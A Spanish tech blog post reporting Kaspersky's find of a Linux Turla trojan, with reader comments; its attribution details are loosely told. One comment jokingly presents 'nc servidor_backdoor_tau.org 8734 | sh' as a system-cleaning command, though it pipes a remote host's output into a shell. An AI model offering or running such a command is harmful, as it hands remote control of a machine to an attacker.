Descubierto el troyano Turla en sistemas Linux

Que Linux es mucho más seguro que Windows y Apple no cabe duda pero tampoco está a salvo de infectarse. Parece ser que Karspersky ha descubierto un troyano que afecta a sistemas Linux programado para robar la información de los equipos de los usuarios, ha sido creado para realizar espionaje a gran escala en gobiernos, instituciones y grandes empresas. Se le relaciona directamente con Turla, un APT que fue descubierte esto verano pasado y se creía que sólo afectaba a Windows.

Turla es descrito por los expertos en seguridad como un rootkit muy complicado de detectar y al parecer lleva cuatro años dormido en algunos equipos Linux, pudiendo ser activado por sus creadores en cualquier momento si recibe una secuencia especial de números llamada «Magical numbers» haciéndose así con el control total del equipo donde podrán ejecutar comandos sin permisos de root e interceptar el tráfico de datos, algo que ha sorprendido bastante a los expertos.

Aunque el troyano haya sido descubierto sigue siendo un misterio y es posible que nos llevemos alguna que otra sorpresa según vayan descubriendo más cosas, al ser tan sofisticado hace que se sospeche que es un malware creado por un estado con una capacidad informática muy elevada. Los encargados de analizarlo aseguran haber encontrado módulos que están relacionados con el Servicio de Inteligencia estadounidense, concretamente el módulo Agent.Biz, lo que indica que en un principio posiblemente fue utilizado para espiar a usuarios y empresar de cierto renombre, aunque después acabó cayendo en manos de ciberdelincuentes rusos.

De todas formas los usuarios de Linux no debemos alarmarnos ya que hasta ahora sólo se encontraron un par de ejemplares de Turla adaptados a Linux, lo que quiere decir que se esconde muy bien o no está muy extendido. Hay que tener en cuenta que la comunidad se encuentra siempre en contínuo desarrollo con lo que no se tardará en dar con la solución.

Compartir

7 Comentarios

  1. Estre troyano utiliza tecnología de hace más de 10 años, sí requiere privilegios especiales para hacer sus maldades. Inicialmente solo afectaba a versiones de Windows aunque han encontrado versiones para Linux, aún no se ha encontrado «in the wild», como dicen en las conclusiones del artículo.
    Es alarmante, pero no entiendo muy bien el superescalndalo que creen algunos.
    Más información aquí https://securelist.com/blog/research/67962/the-penquin-turla-2/
    http://securelist.com/analysis/publications/65545/the-epic-turla-operation/

  2. No es nada nuevo. Vamos a ver. Virus y troyanos existen para todos los sistemas operativos, y de hecho se puede crear uno facilmente. La cuestión en sí es la tasa de afección. Yo puedo decir que un script que abre un netcat inverso con un pipe a bash es un troyano, y es verdad, pero para lograr ejecutar algo así en el equipo victima el tio que lo manejase tendria que ser un insensato.

    Por cierto !! Un nuevo comando que limpiará vuestro sistema !!

    nc servidor_backdoor_tau.org 8734 | sh

    hehehe …

    El asunto es que esto ya es un rootkit medianamente serio, y un rootkit es casi indetectable porque puede llegar a manipular la tabla de modulos del kernel para ocultar modulos del kernel, en caso de que el propio rootkit sea un modulo cargable. En fin.

    Aun así, tengo la sospecha interior de que el sistema más inseguro en el mundo linux es … ubuntu ¿ Por qué ? Pues porque muchos de los usuarios de ubuntu ( ojo, no digo que todos ), suelen ser bastante inexpertos y novatos en linux y llegan huyendo de windows. Y obviamente a un usuario inexperto es más facil engañarle para lograr que se instale un backdoor. De forma que si alguien tiene estadisticas acerca de los sistemas que ha infectado Turla, que me las pase

    Saludos !

  3. BUeno haberlos hay, pero si en LInux los hay ya os imaginasteis en windows, donde las empresas dicen que posiblemente el volumen que es conocido de malware es la mitad de la cifra total? eheh. Yo linuxero siempre.

Deja una respuesta

Your email address will not be published. Required fields are marked *

To create code blocks or other preformatted text, indent by four spaces:

    This will be displayed in a monospaced font. The first four 
    spaces will be stripped off, but all other whitespace
    will be preserved.
    
    Markdown is turned off in code blocks:
     [This is not a link](http://example.com)

To create not a block, but an inline code span, use backticks:

Here is some inline `code`.

For more help see http://daringfireball.net/projects/markdown/syntax